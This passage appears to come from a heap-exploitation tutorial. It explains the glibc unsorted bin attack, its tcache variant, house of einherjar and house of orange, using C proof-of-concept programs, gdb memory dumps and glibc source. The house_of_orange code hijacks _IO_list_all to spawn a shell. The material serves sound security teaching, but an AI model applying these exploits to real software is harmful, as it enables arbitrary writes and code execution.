0x555555756050: 0x0000000000000000 0x0000000000000000
0x555555756060: 0x0000000000000000 0x0000000000000000
0x555555756070: 0x0000000000000000 0x0000000000000000
0x555555756080: 0x0000000000000000 0x0000555555756670 <-- entries
0x555555756090: 0x0000000000000000 0x0000000000000000
0x5555557560a0: 0x0000000000000000 0x0000000000000000
0x5555557560b0: 0x0000000000000000 0x0000000000000000
0x5555557560c0: 0x0000000000000000 0x0000000000000000
0x5555557560d0: 0x0000000000000000 0x0000000000000000
After malloc:
gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x555555756260: 0x00007ffff7dd2b80 0x00007ffff7dd2b80
0x555555756270: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdcc0: 0x00007ffff7dd2b00 0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000 0x0700000000000000 <-- counts <-- counts
0x555555756020: 0x0000000000000000 0x0000000000000000
0x555555756030: 0x0000000000000000 0x0000000000000000
0x555555756040: 0x0000000000000000 0x0000000000000000
0x555555756050: 0x0000000000000000 0x0000000000000000
0x555555756060: 0x0000000000000000 0x0000000000000000
0x555555756070: 0x0000000000000000 0x0000000000000000
0x555555756080: 0x0000000000000000 0x0000555555756670 <-- entries
0x555555756090: 0x0000000000000000 0x0000000000000000
0x5555557560a0: 0x0000000000000000 0x0000000000000000
0x5555557560b0: 0x0000000000000000 0x0000000000000000
0x5555557560c0: 0x0000000000000000 0x00007fffffffdcc0 <-- entries
0x5555557560d0: 0x0000000000000000 0x0000000000000000
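We can see that during malloc the fake chunk is linked into the tcache bin again and again until the bin is full, and only then is it taken from the unsorted bin. As before, the fd of the fake chunk points to the unsorted bin.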
unsorted_bin_attack
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_var = 0;
fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
unsigned long *p = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
free(p);
fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);
p[1] = (unsigned long)(&stack_var - 2);
fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);
malloc(0x80);
fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffc9b1d61b0 -> 0
Now, we allocate first small chunk on the heap at: 0x1066010
We free the first chunk now. Its bk pointer point to 0x7f2404cf5b78
We write it with the target address-0x10: 0x7ffc9b1d61a0
Let's malloc again to get the chunk we just free: 0x7ffc9b1d61b0 -> 0x7f2404cf5b78
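An unsorted bin attack is usually a preparation step for a further attack. The unsorted bin is a doubly linked list, and during allocation a chunk is removed from it by an unlink-style operation. If we control the bk pointer of a chunk in the unsorted bin, we can therefore write a pointer to an arbitrary location. Here the removal writes a libc address into memory we control, which leaks information and makes further attacks easier.
The removal from the unsorted bin looks like this: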
/* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
where bck = victim->bk.
First allocate two chunks and free the first one, which is added to the unsorted bin:
gef➤ x/26gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1 [freed]
0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000090 0x0000000000000020 <-- chunk 2
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6020c0: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx &stack_var-2
0x7fffffffdc50: 0x00007fffffffdd60 0x0000000000400712
0x7fffffffdc60: 0x0000000000000000 0x0000000000602010
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x90, flags=PREV_INUSE)
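Then assume an overflow lets us modify the data of chunk 1. We set the bk pointer of chunk 1 to &stack_var - 2 (the target address minus 0x10), which amounts to placing a fake free chunk whose fd field lies at the target address, and then call malloc: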
gef➤ x/26gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 3
0x602010: 0x00007ffff7dd1b78 0x00007fffffffdc50
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000090 0x0000000000000021 <-- chunk 2
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6020c0: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx &stack_var-2
0x7fffffffdc50: 0x00007fffffffdc80 0x0000000000400756 <-- fake chunk
0x7fffffffdc60: 0x00007ffff7dd1b78 0x0000000000602010 <-- fd->TAIL
This leaks the address of the unsorted bin head.
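The effect of the two removal statements can be replayed on a flat memory model in Python. This is a sketch only: memory is a dictionary from address to 8-byte value, the offsets 0x10 and 0x18 are the fd and bk fields of a 64-bit malloc_chunk, and the function name remove_from_unsorted is hypothetical. The addresses come from the gdb session above.

```python
FD, BK = 0x10, 0x18               # field offsets in a 64-bit malloc_chunk

HEAD = 0x7ffff7dd1b78             # unsorted_chunks(av) in the dump
VICTIM = 0x602000                 # chunk 1, currently in the unsorted bin
TARGET = 0x7fffffffdc60           # &stack_var in the dump

mem = {
    VICTIM + FD: HEAD,
    VICTIM + BK: TARGET - 0x10,   # attacker-controlled bk
    HEAD + BK: VICTIM,
    TARGET: 0,                    # stack_var before the attack
}

def remove_from_unsorted(mem, head, victim):
    """Replay the two writes glibc performs when taking victim off the list."""
    bck = mem[victim + BK]
    mem[head + BK] = bck          # unsorted_chunks (av)->bk = bck;
    mem[bck + FD] = head          # bck->fd = unsorted_chunks (av);

remove_from_unsorted(mem, HEAD, VICTIM)
print(hex(mem[TARGET]))
```

After the call, the target holds the bin head address, matching the value at 0x7fffffffdc60 in the second dump.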
Now let's see how libc-2.27 handles this:
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_var = 0;
fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
unsigned long *p = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
free(p);
fprintf(stderr, "Freed the first chunk to put it in a tcache bin\n");
p[0] = (unsigned long)(&stack_var);
fprintf(stderr, "Overwrite the next ptr with the target address\n");
malloc(0x80);
malloc(0x80);
fprintf(stderr, "Now we malloc twice to make tcache struct's counts '0xff'\n\n");
free(p);
fprintf(stderr, "Now free again to put it in unsorted bin\n");
p[1] = (unsigned long)(&stack_var - 2);
fprintf(stderr, "Now write its bk ptr with the target address-0x10: %p\n\n", (void*)p[1]);
malloc(0x80);
fprintf(stderr, "Finally malloc again to get the chunk at target address: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g tcache_unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffef0884c10 -> 0
Now, we allocate first small chunk on the heap at: 0x564866907260
Freed the first chunk to put it in a tcache bin
Overwrite the next ptr with the target address
Now we malloc twice to make tcache struct's counts '0xff'
Now free again to put it in unsorted bin
Now write its bk ptr with the target address-0x10: 0x7ffef0884c00
Finally malloc again to get the chunk at target address: 0x7ffef0884c10 -> 0x7f69ba1d8ca0
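Because of tcache, when malloc takes a chunk from the unsorted bin and the corresponding tcache bin is not yet full, it first moves the matching chunks from the unsorted bin into that tcache bin and then serves the request from the tcache bin. That is where the problem arises: while filling the tcache bin, malloc treats our target address as a chunk as well, but this "chunk" fails the checks and a "memory corruption" error is raised: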
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize_nomask (victim)
> av->system_mem, 0))
malloc_printerr ("malloc(): memory corruption");
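To skip the step that puts chunks into the tcache, the counts field of the corresponding tcache bin must be no less than tcache_count (7 by default). But if counts is nonzero, the tcache bin normally holds chunks, so malloc would take one directly from the tcache bin and the unsorted bin would never be involved: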
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
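This is a contradiction, so we need a way to take a chunk from the unsorted bin without having it put into the tcache bin.
This is why the code above uses tcache poisoning (see Section 4.14) to set counts to 0xff. When execution reaches the code below, it takes the else branch, and the chunk is removed and returned directly: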
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
The address of the unsorted bin head is thus leaked successfully.
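How the counts field ends up at 0xff can be seen in a toy model of one tcache bin. This is a simplified sketch, not glibc code: the class TcacheBin is hypothetical, the counter is modeled as a single byte that wraps, and the next pointer of the target is assumed to be 0, as stack_var is in the listing.

```python
TCACHE_COUNT = 7                   # default mp_.tcache_count

class TcacheBin:
    """Toy model of one tcache bin: a singly linked list plus a byte counter."""
    def __init__(self):
        self.count = 0
        self.entry = None          # head of the list, None models NULL
        self.next = {}             # chunk -> next pointer stored in the chunk

    def put(self, chunk):
        self.next[chunk] = self.entry
        self.entry = chunk
        self.count = (self.count + 1) & 0xff

    def get(self):
        chunk = self.entry
        self.entry = self.next.get(chunk)     # next is trusted, not validated
        self.count = (self.count - 1) & 0xff  # 0 - 1 wraps to 0xff
        return chunk

P, TARGET = 0x564866907260, 0x7ffef0884c10    # addresses from the run above

tbin = TcacheBin()
tbin.put(P)                 # free(p): chunk goes into the tcache, count = 1
tbin.next[P] = TARGET       # p[0] = &stack_var: poison the next pointer
first = tbin.get()          # malloc(0x80) returns p, count = 0
second = tbin.get()         # malloc(0x80) returns &stack_var, count wraps
print(hex(first), hex(second), hex(tbin.count), tbin.entry)
```

At the end the bin is empty, so malloc does not serve requests from it, while the counter is not below TCACHE_COUNT, so neither free nor the unsorted bin loop will put chunks into it.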
house_of_einherjar
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
uint8_t *a, *b, *d;
a = (uint8_t*) malloc(0x10);
int real_a_size = malloc_usable_size(a);
memset(a, 'A', real_a_size);
fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n\n", a);
size_t fake_chunk[6];
fake_chunk[0] = 0x80;
fake_chunk[1] = 0x80;
fake_chunk[2] = (size_t) fake_chunk;
fake_chunk[3] = (size_t) fake_chunk;
fake_chunk[4] = (size_t) fake_chunk;
fake_chunk[5] = (size_t) fake_chunk;
fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
fprintf(stderr, "prev_size: %#lx\n", fake_chunk[0]);
fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
fprintf(stderr, "bck_nextsize: %#lx\n\n", fake_chunk[5]);
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);
uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
fprintf(stderr, "We allocate 0xf8 bytes for 'b': %p\n", b);
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
fprintf(stderr, "We write a fake prev_size to the last %lu bytes of a so that it will consolidate with our fake chunk\n", sizeof(size_t));
fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
fake_chunk[1] = fake_size;
fprintf(stderr, "Modify fake chunk's size to reflect b's new prev_size\n");
fprintf(stderr, "Now we free b and this will consolidate with our fake chunk\n");
free(b);
fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);
d = malloc(0x10);
memset(d, 'A', 0x10);
fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk: %p\n", d);
}
$ gcc -g house_of_einherjar.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xb31010
Our fake chunk at 0x7ffdb337b7f0 looks like:
prev_size: 0x80
size: 0x80
fwd: 0x7ffdb337b7f0
bck: 0x7ffdb337b7f0
fwd_nextsize: 0x7ffdb337b7f0
bck_nextsize: 0x7ffdb337b7f0
We allocate 0xf8 bytes for 'b': 0xb31030
b.size: 0x101
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100
We write a fake prev_size to the last 8 bytes of a so that it will consolidate with our fake chunk
Our fake prev_size will be 0xb31020 - 0x7ffdb337b7f0 = 0xffff80024d7b5830
Modify fake chunk's size to reflect b's new prev_size
Now we free b and this will consolidate with our fake chunk
Our fake chunk size is now 0xffff80024d7d6811 (b.size + fake_prev_size)
Now we can call malloc() and it will begin in our fake chunk: 0x7ffdb337b800
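house-of-einherjar is a technique that makes malloc return a nearly arbitrary pointer. It requires a single-byte overflow that overwrites the size field of the next chunk and clears its PREV_INUSE flag, and the prev_size field must also be overwritten with the size of the fake chunk. When the next chunk is freed, it sees the previous chunk marked as free and tries to consolidate. If we carefully craft a fake chunk so that the consolidated chunk starts at the fake chunk, the next malloc returns the address we want. It is more powerful than the poison-null-byte technique covered earlier, but it also has more prerequisites, such as a heap information leak.
First allocate chunk a, which we assume has an off-by-one overflow, then create our fake chunk on the stack. The chunk size is arbitrary as long as it is a small chunk: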
gef➤ x/8gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x0000000000020fe1 <-- top chunk
0x603030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx &fake_chunk
0x7fffffffdcb0: 0x0000000000000080 0x0000000000000080 <-- fake chunk
0x7fffffffdcc0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdcd0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdce0: 0x00007fffffffddd0 0xffa7b97358729300
Next create chunk b and use the overflow in chunk a to overwrite its size field, clearing the PREV_INUSE flag. Chunk b then believes that the previous chunk is free:
gef➤ x/8gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x0000000000000100 <-- chunk b
0x603030: 0x0000000000000000 0x0000000000000000
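The size field of chunk b was originally 0x101. We chose malloc(0xf8) for chunk b for convenience: the null-byte overwrite changes only the flag bits, not the size.
Next, set the prev_size field of chunk b according to the position of the fake chunk on the stack. It is computed as the start address of chunk b minus the start address of the fake chunk. To pass the check, the size field of the fake chunk must also match the prev_size field of chunk b: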
gef➤ x/8gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0xffff800000605370 0x0000000000000100 <-- chunk b <-- prev_size
0x603030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx &fake_chunk
0x7fffffffdcb0: 0x0000000000000080 0xffff800000605370 <-- fake chunk <-- size
0x7fffffffdcc0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdcd0: 0x00007fffffffdcb0 0x00007fffffffdcb0
0x7fffffffdce0: 0x00007fffffffddd0 0xadeb3936608e0600
Free chunk b. Because PREV_INUSE is zero, free uses prev_size to locate the previous free chunk, unlinks it, and merges it with the current chunk. This is visible in the arena:
gef➤ heap arenas
Arena (base=0x7ffff7dd1b20, top=0x7fffffffdcb0, last_remainder=0x0, next=0x7ffff7dd1b20, next_free=0x0, system_mem=0x21000)
The consolidation process was also covered in the poison-null-byte section.
Finally, when we malloc again, the returned address is that of the fake chunk:
gef➤ x/8gx &fake_chunk
0x7fffffffdcb0: 0x0000000000000080 0x0000000000000021 <-- chunk d
0x7fffffffdcc0: 0x4141414141414141 0x4141414141414141
0x7fffffffdcd0: 0x00007fffffffdcb0 0xffff800000626331
0x7fffffffdce0: 0x00007fffffffddd0 0xbdf40e22ccf46c00
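The fake prev_size is plain 64-bit modular arithmetic and can be checked in Python against both the program output and the gdb session. This is a minimal sketch; the helper names fake_prev_size and prev_chunk are hypothetical.

```python
MASK = (1 << 64) - 1        # emulate 64-bit unsigned arithmetic

def fake_prev_size(chunk_b, fake_chunk):
    """prev_size that makes chunk_b's 'previous chunk' be fake_chunk."""
    return (chunk_b - fake_chunk) & MASK

def prev_chunk(chunk_b, prev_size):
    """Where free() looks for the previous chunk: chunk_b - prev_size."""
    return (chunk_b - prev_size) & MASK

# Addresses from the program output above
run = fake_prev_size(0xb31020, 0x7ffdb337b7f0)
# Addresses from the gdb session above
dbg = fake_prev_size(0x603020, 0x7fffffffdcb0)

print(hex(run), hex(dbg), hex(prev_chunk(0x603020, dbg)))
```

Because the stack lies above the heap, the difference is negative and wraps to a very large unsigned value; subtracting it from the address of chunk b wraps back to the fake chunk.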
house_of_orange
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int winner (char *ptr);
int main() {
char *p1, *p2;
size_t io_list_all, *top;
p1 = malloc(0x400 - 0x10);
top = (size_t *) ((char *) p1 + 0x400 - 0x10);
top[1] = 0xc01;
p2 = malloc(0x1000);
io_list_all = top[2] + 0x9a8;
top[3] = io_list_all - 0x10;
memcpy((char *) top, "/bin/sh\x00", 8);
top[1] = 0x61;
_IO_FILE *fp = (_IO_FILE *) top;
fp->_mode = 0; // top+0xc0
fp->_IO_write_base = (char *) 2; // top+0x20
fp->_IO_write_ptr = (char *) 3; // top+0x28
size_t *jump_table = &top[12]; // controlled memory
jump_table[3] = (size_t) &winner;
*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8
malloc(1);
return 0;
}
int winner(char *ptr) {
system(ptr);
return 0;
}
$ gcc -g house_of_orange.c
$ ./a.out
*** Error in `./a.out': malloc(): memory corruption: 0x00007f3daece3520 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f3dae9957e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7f3dae9a013e]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7f3dae9a2184]
./a.out[0x4006cc]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f3dae93e830]
./a.out[0x400509]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:01 919342 /home/firmy/how2heap/a.out
00600000-00601000 r--p 00000000 08:01 919342 /home/firmy/how2heap/a.out
00601000-00602000 rw-p 00001000 08:01 919342 /home/firmy/how2heap/a.out
01e81000-01ec4000 rw-p 00000000 00:00 0 [heap]
7f3da8000000-7f3da8021000 rw-p 00000000 00:00 0
7f3da8021000-7f3dac000000 ---p 00000000 00:00 0
7f3dae708000-7f3dae71e000 r-xp 00000000 08:01 398989 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae71e000-7f3dae91d000 ---p 00016000 08:01 398989 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91d000-7f3dae91e000 rw-p 00015000 08:01 398989 /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91e000-7f3daeade000 r-xp 00000000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daeade000-7f3daecde000 ---p 001c0000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daecde000-7f3daece2000 r--p 001c0000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece2000-7f3daece4000 rw-p 001c4000 08:01 436912 /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece4000-7f3daece8000 rw-p 00000000 00:00 0
7f3daece8000-7f3daed0e000 r-xp 00000000 08:01 436908 /lib/x86_64-linux-gnu/ld-2.23.so
7f3daeef4000-7f3daeef7000 rw-p 00000000 00:00 0
7f3daef0c000-7f3daef0d000 rw-p 00000000 00:00 0
7f3daef0d000-7f3daef0e000 r--p 00025000 08:01 436908 /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0e000-7f3daef0f000 rw-p 00026000 08:01 436908 /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0f000-7f3daef10000 rw-p 00000000 00:00 0
7ffe8eba6000-7ffe8ebc7000 rw-p 00000000 00:00 0 [stack]
7ffe8ebee000-7ffe8ebf1000 r--p 00000000 00:00 0 [vvar]
7ffe8ebf1000-7ffe8ebf3000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
$ whoami
firmy
$ exit
Aborted (core dumped)
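house-of-orange is an exploitation technique that uses a heap overflow to overwrite the _IO_list_all pointer. It requires leaks of both the heap and libc. Initially the whole heap belongs to the top chunk; each allocation splits a block of the requested size off the top chunk and returns it to the user, so the top chunk keeps shrinking.
When the remaining top chunk can no longer satisfy a request, sysmalloc() is called to obtain new memory. Two things can happen: the top chunk is extended in place, or mmap is called to allocate a new region. Which one is used depends on the request size; to take the first path and extend the top chunk, the request must be smaller than the threshold mp_.mmap_threshold: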
if (av == NULL
|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
&& (mp_.n_mmaps < mp_.n_mmaps_max)))
{
In addition, to reach the _int_free() call in sysmalloc(), the old top chunk must be at least MINSIZE, which is 0x20 on x86-64 (0x10 on 32-bit):
if (old_size >= MINSIZE)
{
_int_free (av, old_top, 1);
}
Of course, the following two checks must also be passed:
/*
If not the first time through, we require old_size to be
at least MINSIZE and to have prev_inuse set.
*/
assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
/* Precondition: not enough current space to satisfy nb request */
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
That is, old_size must be at least MINSIZE and less than nb+MINSIZE, the PREV_INUSE flag must be set, and old_top+old_size must be page aligned.
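These conditions can be collected into one predicate for trying out candidate size values. The sketch below assumes x86-64 constants (MINSIZE 0x20, 4 KiB pages, the default 128 KiB mmap threshold); the function name top_size_ok is hypothetical and the checks mirror only the asserts quoted above.

```python
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1
MINSIZE = 0x20                   # assumption: x86-64
PAGE_SIZE = 0x1000               # assumption: 4 KiB pages
MMAP_THRESHOLD = 128 * 1024      # default mp_.mmap_threshold
PREV_INUSE = 0x1

def request2size(req):
    """Chunk size glibc uses for a request of req bytes."""
    return max((req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK, MINSIZE)

def top_size_ok(old_top, size_field, request):
    """True if a forged top size lets malloc(request) free the old top chunk."""
    nb = request2size(request)
    old_size = size_field & ~0x7
    return (nb < MMAP_THRESHOLD                          # stay off the mmap path
            and old_size >= MINSIZE
            and bool(size_field & PREV_INUSE)
            and (old_top + old_size) % PAGE_SIZE == 0    # old_end page aligned
            and old_size < nb + MINSIZE)                 # top too small for nb

print(top_size_ok(0x602400, 0xc01, 0x1000))    # the value used in the listing
print(top_size_ok(0x602400, 0xd01, 0x1000))    # end not page aligned
```

With the top chunk at 0x602400, the forged size 0xc01 passes because 0x602400+0xc00 ends on a page boundary, while a value such as 0xd01 fails the alignment check.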
First allocate a chunk of size 0x400:
gef➤ x/4gx p1-0x10
0x602000: 0x0000000000000000 0x0000000000000401 <-- chunk p1
0x602010: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000020c01 <-- top chunk
0x602410: 0x0000000000000000 0x0000000000000000
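By default the initial top chunk is 0x21000 bytes. After subtracting 0x400 its size is 0x20c00, and PREV_INUSE is set.
Now assume an overflow lets us modify the top chunk. We change its size field to 0xc01, which satisfies the conditions above: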
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000000c01 <-- top chunk
0x602410: 0x0000000000000000 0x0000000000000000
Next we request a large block. Since the modified top chunk size cannot satisfy the request, sysmalloc takes the first path and extends the heap. A new top chunk is created after old_top, and old_top is freed, that is, added to the unsorted bin:
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000000be1 <-- old top chunk [freed]
0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
gef➤ x/4gx p1-0x10+0x400+0xbe0
0x602fe0: 0x0000000000000be0 0x0000000000000010 <-- fencepost chunk 1
0x602ff0: 0x0000000000000000 0x0000000000000011 <-- fencepost chunk 2
gef➤ x/4gx p2-0x10
0x623000: 0x0000000000000000 0x0000000000001011 <-- chunk p2
0x623010: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p2-0x10+0x1010
0x624010: 0x0000000000000000 0x0000000000020ff1 <-- new top chunk
0x624020: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602400, bk=0x602400
→ Chunk(addr=0x602410, size=0xbe0, flags=PREV_INUSE)
This leaks a libc address. Note also that the old top chunk has shrunk by 0x20; that space is used for the fencepost chunks. The heap now looks like this:
+---------------+
| p1 |
+---------------+
| old top-0x20 |
+---------------+
| fencepost 1 |
+---------------+
| fencepost 2 |
+---------------+
| ... |
+---------------+
| p2 |
+---------------+
| new top |
+---------------+
The details are as follows:
if (old_size != 0)
{
/*
Shrink old_top to insert fenceposts, keeping size a
multiple of MALLOC_ALIGNMENT. We know there is at least
enough space in old_top to do this.
*/
old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
set_head (old_top, old_size | PREV_INUSE);
/*
Note that the following assignments completely overwrite
old_top when old_size was previously MINSIZE. This is
intentional. We need the fencepost, even if old_top otherwise gets
lost.
*/
chunk_at_offset (old_top, old_size)->size =
(2 * SIZE_SZ) | PREV_INUSE;
chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
(2 * SIZE_SZ) | PREV_INUSE;
/* If possible, release the rest. */
if (old_size >= MINSIZE)
{
_int_free (av, old_top, 1);
}
}
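The shrink step in this excerpt can be replayed in Python to see where the fenceposts land. This is a sketch assuming 64-bit sizes; insert_fenceposts is a hypothetical helper that mirrors only the arithmetic, not the writes to memory.

```python
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1
PREV_INUSE = 0x1

def insert_fenceposts(old_top, old_size):
    """Return the shrunken size and the addresses of the two fenceposts."""
    new_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK
    fence1 = old_top + new_size              # chunk_at_offset(old_top, old_size)
    fence2 = fence1 + 2 * SIZE_SZ            # ... old_size + 2 * SIZE_SZ
    return new_size, fence1, fence2

new_size, fence1, fence2 = insert_fenceposts(0x602400, 0xc00)
fence_size = (2 * SIZE_SZ) | PREV_INUSE      # size written into each fencepost
print(hex(new_size | PREV_INUSE), hex(fence1), hex(fence2), hex(fence_size))
```

For the forged size 0xc00 this gives an old top of 0xbe0 with fenceposts at 0x602fe0 and 0x602ff0, matching the dump. In that dump the first fencepost reads 0x10 rather than 0x11, which is consistent with the subsequent _int_free of the old top clearing its PREV_INUSE bit.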
From the fd/bk pointers of the old top chunk in the unsorted bin we can derive the address of _IO_list_all. We then use the overflow to overwrite the bk of the old top chunk with _IO_list_all-0x10, so that the unsorted bin attack overwrites _IO_list_all with &unsorted_bin-0x10:
/* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
gef➤ x/4gx p1-0x10+0x400
0x602400: 0x0000000000000000 0x0000000000000be1
0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510
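The bk value in this dump follows directly from the leaked fd pointer. The sketch below uses the offset 0x9a8 from the C listing; that constant is specific to the libc-2.23 build used there and should be treated as an assumption for any other libc. The helper name forged_bk is hypothetical.

```python
IO_LIST_ALL_OFFSET = 0x9a8       # from the listing; depends on the libc build

def forged_bk(leaked_fd):
    """Derive _IO_list_all from the leaked fd and the bk value to write."""
    io_list_all = leaked_fd + IO_LIST_ALL_OFFSET
    return io_list_all, io_list_all - 0x10   # bck->fd then lands on _IO_list_all

io_list_all, bk = forged_bk(0x7ffff7dd1b78)
print(hex(io_list_all), hex(bk))
```

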